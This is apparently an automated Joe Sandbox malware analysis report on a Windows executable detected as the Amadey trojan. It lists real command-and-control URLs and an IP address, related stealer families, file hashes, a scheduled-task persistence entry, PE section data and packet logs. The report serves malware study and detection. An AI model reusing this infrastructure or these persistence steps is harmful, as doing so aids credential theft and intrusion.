http://185.215.113.16/Jo89Ku7d/index.phpd	axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php2h	axplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php3i	axplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpded	axplong.exe, 00000005.00000002.3453927497.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php8	axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpBi	axplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpiP	axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php#h	axplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/Jo89Ku7d/index.php4	axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpncoded	axplong.exe, 00000005.00000002.3453927497.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.16	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519603
Start date and time:	2024-09-26 18:27:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/3@0/1
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target axplong.exe, PID 6436 because there are no executed function
Execution Graph export aborted for target file.exe, PID 3108 because it is empty
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
12:29:01	API Interceptor	362974x Sleep call for process: axplong.exe modified
18:28:07	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.16	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, Go Injector, XWorm	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, Stealc, zgRAT	Browse	185.215.113.16/inc/newbundle2.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.103
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1870848
Entropy (8bit):	7.950251739270574
Encrypted:	false
SSDEEP:	49152:pckGmHJsntsGStzRGwDVgsHY6P+04IYs:pLlWtsf9ZDKs/204Iv
MD5:	A3A83347AE8FCDEE6EC20F6BA13311C9
SHA1:	C9DA81CFC77925B9D7039A960ADB5AABD5596128
SHA-256:	E7B520A3A7D70E9E99B32E44E2604A9A4B05A95964C3EF27054D00564D16EF5B
SHA-512:	EA4766909DD8314D430B15F097856FD26CF9584C488F8F8F26856FDDDF76C9DA879730CE292BA52CD8BEEDB6F02D3189265CC09CBC6942E5E8F50F692688013C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f.............................`J...........@...........................J..........@.................................W...k............................?J..............................>J..................................................... . ............................@....rsrc...............................@....idata ............................@... . *.........................@...qvaauuzo......0..r..................@...ezuxwngn.....PJ......f..............@....taggant.0...`J.."...j..............@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	304
Entropy (8bit):	3.43154915595732
Encrypted:	false
SSDEEP:	6:PJmXj/XlXUEZ+lX1lOJUPelkDdtE9+AQy0lbKt0:hkj1Q1lOmeeDs9+nVGt0
MD5:	0F2F6BF08D125224B03F7A5D6B45A2CD
SHA1:	2CD0797B39EDD82C2DDD98398848CD185DDDB6F1
SHA-256:	52017765580644A6461E0F32A7DE23CF8CC7C7250713F193ECB1A2242F06405F
SHA-512:	985C7A30C76590C0845F317FAC18A6D26F6B71EE1E1BC12F6E00057ED6EAFF1B6B7D8BE1261A0B0319C799D515C54F503CF066223583A4E755CE54931F203F73
Malicious:	false
Reputation:	low
Preview:	....Qz.G.=.O...p.3\DF.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.950251739270574
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'870'848 bytes
MD5:	a3a83347ae8fcdee6ec20f6ba13311c9
SHA1:	c9da81cfc77925b9d7039a960adb5aabd5596128
SHA256:	e7b520a3a7d70e9e99b32e44e2604a9a4b05a95964c3ef27054d00564d16ef5b
SHA512:	ea4766909dd8314d430b15f097856fd26cf9584c488f8f8f26856fdddf76c9da879730ce292ba52cd8beedb6f02d3189265cc09cbc6942e5e8f50f692688013c
SSDEEP:	49152:pckGmHJsntsGStzRGwDVgsHY6P+04IYs:pLlWtsf9ZDKs/204Iv
TLSH:	D98533F0369E2C6FD4940037AC708967DD6620474CECEC32F92D6A9A65078A69F7E05F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8a6000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F4FE953555Ah
punpckhdq mm3, qword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F4FE9537555h
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+00h], ah
add byte ptr [eax], al
xchg eax, esp
xchg eax, ecx
sldt word ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4a3f00	0x10	qvaauuzo
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4a3eb0	0x18	qvaauuzo
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	148e3fdcbd2a1d7648fae458dab10c0c	False	0.9973018136920981	OpenPGP Public Key	7.983537671384169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	4d2a8dd332268a2a82a9da1b415616b8	False	0.576171875	data	4.540744250156543	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2a2000	0x200	310980800030f6b11bd8e5668f78fbef	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qvaauuzo	0x30d000	0x198000	0x197200	817930e6a95668a710af2b4a9cb3a4da	False	0.9943085325836659	data	7.953327173780446	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ezuxwngn	0x4a5000	0x1000	0x400	2e4f54039fa89d375e28ebc57dffb532	False	0.7744140625	data	6.0665248263387745	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4a6000	0x3000	0x2200	764e826d6024bb57f41f97469222e337	False	0.06916360294117647	DOS executable (COM)	0.7403891082527401	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4a3f10	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T18:29:19.901497+0200	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.6	49735	185.215.113.16	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 18:29:02.918879032 CEST	49720	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:02.923892021 CEST	80	49720	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:02.923991919 CEST	49720	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:02.924305916 CEST	49720	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:02.929611921 CEST	80	49720	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:03.650181055 CEST	80	49720	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:03.650424957 CEST	49720	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:03.652704000 CEST	49720	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:03.659868956 CEST	80	49720	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:03.882004023 CEST	80	49720	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:03.882442951 CEST	49720	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:03.997422934 CEST	49720	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:03.997745037 CEST	49721	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:04.003460884 CEST	80	49721	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:04.003539085 CEST	80	49720	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:04.003676891 CEST	49720	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:04.003832102 CEST	49721	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:04.003832102 CEST	49721	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:04.009155989 CEST	80	49721	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:04.715169907 CEST	80	49721	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:04.715581894 CEST	49721	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:04.716381073 CEST	49721	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:04.721302032 CEST	80	49721	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:04.944526911 CEST	80	49721	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:04.944612026 CEST	49721	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:05.059962988 CEST	49721	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:05.060293913 CEST	49722	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:05.065253019 CEST	80	49722	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:05.065330029 CEST	49722	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:05.065445900 CEST	49722	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:05.065524101 CEST	80	49721	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:05.065577984 CEST	49721	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:05.070239067 CEST	80	49722	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:05.784467936 CEST	80	49722	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:05.784569025 CEST	49722	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:05.785368919 CEST	49722	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:05.790206909 CEST	80	49722	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:06.014287949 CEST	80	49722	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:06.014364958 CEST	49722	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:06.122502089 CEST	49722	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:06.123060942 CEST	49723	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:06.127980947 CEST	80	49723	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:06.128093004 CEST	49723	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:06.128329039 CEST	49723	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:06.128376007 CEST	80	49722	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:06.128447056 CEST	49722	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:06.133073092 CEST	80	49723	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:06.841623068 CEST	80	49723	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:06.841707945 CEST	49723	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:06.842906952 CEST	49723	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:06.847817898 CEST	80	49723	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:07.073262930 CEST	80	49723	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:07.073422909 CEST	49723	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:07.185256004 CEST	49723	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:07.185739040 CEST	49724	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:07.190567017 CEST	80	49723	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:07.190588951 CEST	80	49724	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:07.190695047 CEST	49723	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:07.190746069 CEST	49724	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:07.190948963 CEST	49724	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:07.195765972 CEST	80	49724	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:07.912728071 CEST	80	49724	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:07.912914991 CEST	49724	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:07.913733959 CEST	49724	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:07.918468952 CEST	80	49724	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:08.141066074 CEST	80	49724	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:08.141156912 CEST	49724	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:08.247617960 CEST	49724	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:08.248075008 CEST	49725	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:08.252818108 CEST	80	49724	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:08.252887964 CEST	49724	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:08.253015041 CEST	80	49725	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:08.253099918 CEST	49725	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:08.253267050 CEST	49725	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:08.258133888 CEST	80	49725	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:08.942171097 CEST	80	49725	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:08.942270041 CEST	49725	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:08.943064928 CEST	49725	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:08.949929953 CEST	80	49725	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:09.174534082 CEST	80	49725	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:09.174622059 CEST	49725	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:09.278805971 CEST	49725	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:09.279175043 CEST	49726	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:09.284126043 CEST	80	49725	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:09.284224987 CEST	80	49726	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:09.284255028 CEST	49725	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:09.284320116 CEST	49726	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:09.284492016 CEST	49726	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:09.289424896 CEST	80	49726	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:10.045361042 CEST	80	49726	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:10.045486927 CEST	49726	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:10.046216011 CEST	49726	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:10.051206112 CEST	80	49726	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:10.285099030 CEST	80	49726	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:10.285191059 CEST	49726	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:10.388051987 CEST	49726	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:10.388364077 CEST	49727	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:10.393261909 CEST	80	49726	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:10.393341064 CEST	49726	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:10.393593073 CEST	80	49727	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:10.393671989 CEST	49727	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:10.393815041 CEST	49727	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:10.399167061 CEST	80	49727	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:11.168631077 CEST	80	49727	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:11.168732882 CEST	49727	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:11.169435024 CEST	49727	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:11.174348116 CEST	80	49727	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:11.398538113 CEST	80	49727	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:11.398663998 CEST	49727	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:11.515589952 CEST	49727	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:11.515911102 CEST	49728	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:11.520749092 CEST	80	49727	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:11.520823956 CEST	49727	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:11.521104097 CEST	80	49728	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:11.521167994 CEST	49728	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:11.521265984 CEST	49728	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:11.526510000 CEST	80	49728	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:12.247832060 CEST	80	49728	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:12.248024940 CEST	49728	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:12.248661995 CEST	49728	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:12.254062891 CEST	80	49728	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:12.495443106 CEST	80	49728	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:12.495524883 CEST	49728	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:12.606978893 CEST	49728	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:12.607243061 CEST	49729	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:12.616028070 CEST	80	49729	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:12.616177082 CEST	49729	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:12.616657019 CEST	80	49728	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:12.616759062 CEST	49728	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:12.617435932 CEST	49729	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:12.625428915 CEST	80	49729	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:13.351587057 CEST	80	49729	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:13.351757050 CEST	49729	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:13.352613926 CEST	49729	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:13.357894897 CEST	80	49729	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:13.581979036 CEST	80	49729	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:13.582057953 CEST	49729	80	192.168.2.6	185.215.113.16
